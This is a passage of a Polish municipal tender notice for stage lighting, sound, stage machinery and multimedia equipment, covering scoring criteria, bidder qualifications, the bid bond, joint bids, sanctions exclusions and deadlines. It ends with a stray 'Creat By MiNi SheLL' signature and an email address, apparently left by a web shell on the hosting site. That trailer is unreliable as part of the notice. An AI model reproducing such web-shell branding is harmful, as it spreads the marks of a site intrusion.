okresu gwarancji jakości i rękojmi za wady jako 36 miesięcy Wykonawcy zostanie przyznane 0 pkt.<br/><br/>- W przypadku nieuzupełnienia pola – okres gwarancji jakości i rękojmi za wady – Zamawiający domyślnie ustala minimalny wymagany okres jako 36 miesięcy.<br/>- W przypadku wskazania okresu gwarancji jakości i rękojmi za wady niższego niż minimalny wymagany okres tj. 36 miesięcy – oferta będzie podlegać odrzuceniu jako niezgodna z treścią SWZ (art. 226 ust 1 pkt 5)<br/>- W przypadku wskazania okresu gwarancji jakości i rękojmi za wady wyższego niż 60 miesięcy – oferta uzyska maksymalną ilość punktów w danym kryterium tj. 40 pkt.<br/><br/>Punktacja:<br/>- okres 36 m-cy – 0 pkt<br/>- okres 42 m-cy – 10 pkt<br/>- okres 48 m-cy – 20 pkt<br/>- okres 54 m-cy – 30 pkt<br/>- okres 60 m-cy i więcej – 40 pkt<br/><br/>Maksymalnie w danym kryterium można otrzymać 40 pkt.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności techniczne i zawodowe<br/>Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca:<br/>- wykonał w okresie 3 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy, to w tym okresie wykonał należycie co najmniej dwie dostawy (dwie umowy) o wartości nie mniejszej niż 750 000,00 zł brutto każda, polegających na dostawie, montażu i uruchomieniu oświetlenia scenicznego, nagłośnienia, mechaniki scenicznej oraz systemu multimedialnego.<br/>---<br/>Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia w oparciu o złożone oświadczenie składane na podstawie art. 125 ust. 1 ustawy Prawo zamówień publicznych potwierdzające spełnianie warunków udziału w postępowaniu.<br/> <br/>W sytuacji, gdy złożone przez Wykonawcę dokumenty będą zawierały dane w innych walutach niż określono to w treści SWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs NBP z dnia publikacji ogłoszenia o zamówieniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	W celu potwierdzenia zgodności oferowanych dostaw z określonymi przez Zamawiającego<br/>wymaganiami/ cechami, określonymi w opisie przedmiotu zamówienia, należy przedstawić:<br/>1.1 opis techniczny oferowanego sprzętu sporządzony według Załącznika nr 9 do SWZ – Formularza asortymentowo – cenowego potwierdzającego wymagania i parametry techniczne opisane w Załączniku nr 10 do SWZ – Szczegółowy opis przedmiotu zamówienia. Wykonawca zobowiązany jest do jednoznacznego określenia zaoferowanego sprzętu wskazując typ/model oraz producenta oraz potwierdzając spełnienie lub nie spełnienie wymaganych minimalnych parametrów technicznych poprzez wpisanie odpowiedniego sformułowania „Zgodne z OPZ / Nie zgodne z OPZ”<br/>1.2 karta katalogowa lub folder lub ulotka informacyjna lub karta techniczna producenta oferowanego sprzętu potwierdzająca zgodność oferowanego przez Wykonawcę sprzętu z wymaganymi minimalnymi parametrami technicznymi określonymi w Szczegółowym opisie przedmiotu zamówienia – dotyczy pozycji nr 1 i nr 2 w Tabeli nr 1 Formularza asortymentowo-cenowego. Przedmiotowe środki dowodowe Wykonawca składa wraz z ofertą.<br/>2.	Jeżeli wykonawca nie złoży przedmiotowych środków dowodowych o których mowa w pkt.1 lub złożone przedmiotowe środki dowodowe są niekompletne, zamawiający na podstawie art. 107 ust.2 ustawy Pzp wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie z uwzględnieniem postanowień pkt.3.<br/>3.	Przepisu art.107 ust.2 ustawy Pzp nie stosuje się, jeżeli przedmiotowy środek dowodowy służy potwierdzeniu zgodności z cechami lub kryteriami określonymi w opisie kryteriów oceny ofert lub, pomimo złożenia przedmiotowego środka dowodowego, oferta podlega odrzuceniu albo zachodzą przesłanki unieważnienia postępowania.<br/>4.	Zamawiający może żądać od wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Składana oferta powinna zawierać (podpisane w sposób określony w SWZ przez osoby upoważnione do reprezentacji podmiotu) poniższe dokumenty:<br/>a)	wypełniony formularz ofertowy - załącznik 1do SWZ <br/>b)	oświadczenie, o którym mowa w art. 125 ust 1 ustawy Prawo zamówień publicznych dotyczące niepodlegania wykluczeniu oraz spełniania warunków udziału <br/>w postępowaniu w zakresie wskazanym przez Zamawiającego – zał. nr 2<br/>c)	oświadczenie, o którym mowa art. 117 ust 4 ustawy Prawo zamówień publicznych <br/>– w odniesie do wykonawców wspólnie ubiegających się o zamówienie (konsorcjum, spółki cywilne) – zał. nr 3– jeżeli dotyczy,<br/>d)	oświadczenie, o którym mowa w art. 125 ust 5 ustawy Prawo zamówień publicznych <br/>w odniesieniu do podmiotu udostępniającego zasoby – zał. nr 4 – jeśli dotyczy,<br/>e)	zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia – zał. nr 5 – jeśli dotyczy,<br/>f)	wypełniony formularz asortymentowo – cenowy – zał. nr 9<br/>g)	Karty katalogowe lub foldery lub ulotki informacyjne lub karty techniczne producenta, o którym mowa w Rozdziale 16 Informacje o przedmiotowych środkach dowodowych w ust. 1 pkt. 1.2.<br/>h)	pełnomocnictwo lub dokument/y potwierdzające, że osoba działająca <br/>w imieniu wykonawcy jest umocowana do jego reprezentacji np.: odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru . <br/>i)	dowód wniesienia wadium <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca jest zobowiązany wnieść wadium w wysokości 10 000,00 zł (dziesięć tysięcy złotych 00/100)<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego:<br/><br/>Bank Spółdzielczy Głogów Małopolski o/Markowa <br/>Nr rachunku: 63 9159 1036 2004 4000 0084 0002<br/><br/>z adnotacją „Wadium – Znak sprawy: IPP.271.13.2025” <br/><br/>4.	Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert, Zamawiający dopuszcza dołączenie dokumentu potwierdzającego wniesienie wadium do oferty składanej za pośrednictwem platformy e-Zamówienia,<br/>6.	W przypadku wadium wnoszonego w formie niepieniężnej przez konsorcjum <br/>z dokumentu takiego powinien w jakikolwiek sposób wynikać obowiązek gwaranta zapłaty kwoty zabezpieczonej gwarancja w odniesieniu do wykonawcy rozumianego jako wszyscy członkowie konsorcjum, które składa ofertę,<br/>7.	W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium,<br/>c)	termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>d)	zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty wskazanej <br/>w gwarancji/poręczeniu na pierwsze żądanie zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>8.	Zaleca się, aby w przypadku wadium wnoszonego w innej formie niż pieniądz dokument zawierał informację o adresie mailowym na które ma by przesłane oświadczenie <br/>o zwolnieniu wadium.<br/>9.	Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>10.	Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wyk. mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wyk. ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zam. albo reprezentowania w post. i zawarcia umowy w sprawie zamówienia publicznego. Oferty wspólne będą musiały spełniać następujące wymagania:<br/>a) oferta będzie podpisana w taki sposób, by wiązała wszystkich partnerów. Osoba podpisująca ofertę musi posiadać umocowanie prawne do reprezentacji. Umocowanie musi wynikać z pełnomocnictwa – treść pełnomocnictwa powinna dokładnie określać zakres umocowania.<br/>b) wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy jeżeli jest wymagane;<br/>c) wyznaczony lider umocowany będzie do otrzymywania poleceń oraz instrukcji dla<br/>i w imieniu każdego, jak tez dla wszystkich partnerów. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem.<br/>d) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w art. 125 ust 1 [zał. nr 2 do SWZ], składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>2. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców,<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>3. Zamawiający wykluczy z postępowania o udzielenie zamówienia Wykonawców na podstawie przepisów art. 108 ust 1 ustawy Prawo zamówień publicznych oraz art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507) w przypadku zaistnienia którejkolwiek<br/>z przesłanek.<br/>4. Ofertę Wykonawcy podlegającemu wykluczeniu uznaje się za odrzuconą.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) warunek udziału w postępowaniu, o których mowa w ustępie w pkt 13 Lp. – 4 dotyczący zdolności technicznej i zawodowej winien spełniać co najmniej jeden z tych wykonawców albo wszyscy ci wykonawcy wspólnie. Konieczność ich spełniania odnosi się do konsorcjum jako całości, nie do jego poszczególnych członków, z zastrzeżeniem odnoszącym się do posiadanego doświadczenia wskazanego w warunku udziału w postępowaniu gdzie będzie ono rozpatrywane w oparciu o powtarzalności wykonanych zamówień tj. wykonania minimum 2 zamówień przez jeden podmiot (Zgodnie z orzeczeniem TSUE C-387/14 (ESAPROJEKT) /odpowiedź na pytanie czwarte/ Zamawiający wskazuje, że w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub w przypadku korzystania z podmiotów udostępniających zasoby na podstawie art. 118 ustawy Pzp Wykonawca lub minimum jeden Wykonawca wspólnie ubiegający się o zamówienie lub minimum jeden podmiot udostępniający zasoby musi posiadać pełne doświadczenie wskazane w warunku udziału w postępowaniu - dotyczy to konieczności wykazania doświadczenia wynikającego z powtarzalności wykonanych usług tj. wykonania minimum 2 usług przez jeden podmiot)<br/>b) w przypadku o którym mowa w pkt „a)” powyżej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które prace wykonują poszczególni wykonawcy – wzór oświadczenia stanowi zał. nr 3 do SWZ, podział pracy przy realizacji zamówienia musi nawiązywać do posiadanych zasobów lub doświadczenia,<br/>c) brak podstaw do wykluczenia z postępowania o udzielenie zamówienia<br/>w okolicznościach, o których mowa w art. 108 ust 1 ustawy Prawo zamówień publicznych, art. 7 ust 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507) powinien spełnić każdy z wykonawców samodzielnie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Istotne postanowienia umowy, w dym dopuszczalne zmiany umowy określa projekt umowy który stanowi załącznik nr 6 do SWZ<br/>2. Inne zamiany jakie dopuszcza ustawodawca w zakresie zawartej umowy zostały określone w art. 455 ustawy Pzp.<br/>3. Aneks do umowy o przedmiotowe zamówienie wymagać będzie dla swojej ważności, zachowania formy pisemnej<br/>4. Sczegółowy opis zmian został zawarty w SWZ rozdziale 29 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-08 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę w postępowaniu za pośrednictwem platformy zakupowej Zamawiającego dostępnej pod adresem https://ugmarkowa.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-08 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Na podstawie art. 7 ust 1 ustawy z dnia z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507) z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507);<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593, z późn. zm) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka,<br/>o którym mowa w art. 1 pkt 3 ustawy z dnia z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507);<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2023 r. poz. 120 i 295) jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy z dnia z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz. U. z 2024 r. poz. 507).<br/><br/>Rozporządzenie 765/2006 - ROZPORZĄDZENIE RADY (WE) nr 765/2006z dnia 18 maja 2006 r. dotyczące środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy<br/>Rozporządzenie 269/2014 - ROZPORZĄDZENIE RADY (UE) NR 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających<br/>Wykluczenie następuje na okres trwania okoliczności, o których mowa powyżej.<br/>Osoba lub podmiot podlegające wykluczeniu na podstawie powyższych przesłanek, które w okresie tego wykluczenia ubiegają się o udzielenie zamówienia publicznego lub biorą udział w postępowaniu o udzielenie zamówienia publicznego lub w konkursie, podlegają karze pieniężnej.<br/>Przez ubieganie się o udzielenie zamówienia publicznego rozumie się złożenie oferty.<br/><br/>------------------------------------------<br/><br/>Wynagrodzenie ryczałtowe.<br/><br/>----------------------------------------<br/><br/>Wykonawca, którego oferta zostanie wybrana będzie musiał wnieść zabezpieczenie należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej w ofercie.<br/><br/>----------------------------------------<br/><br/><br/>Przed podpisaniem Umowy Wykonawca zobowiązany będzie dostarczyć do Zamawiającego oświadczenie o braku przynależności do którejkolwiek z kategorii podmiotów wymienionych w art. 5k ust. 1 rozporządzenia 833/2014, w brzmieniu nadanym rozporządzeniem 2022/576 (wzór – zał. 7 do SWZ)

Creat By MiNi SheLL
Email: jattceo@gmail.com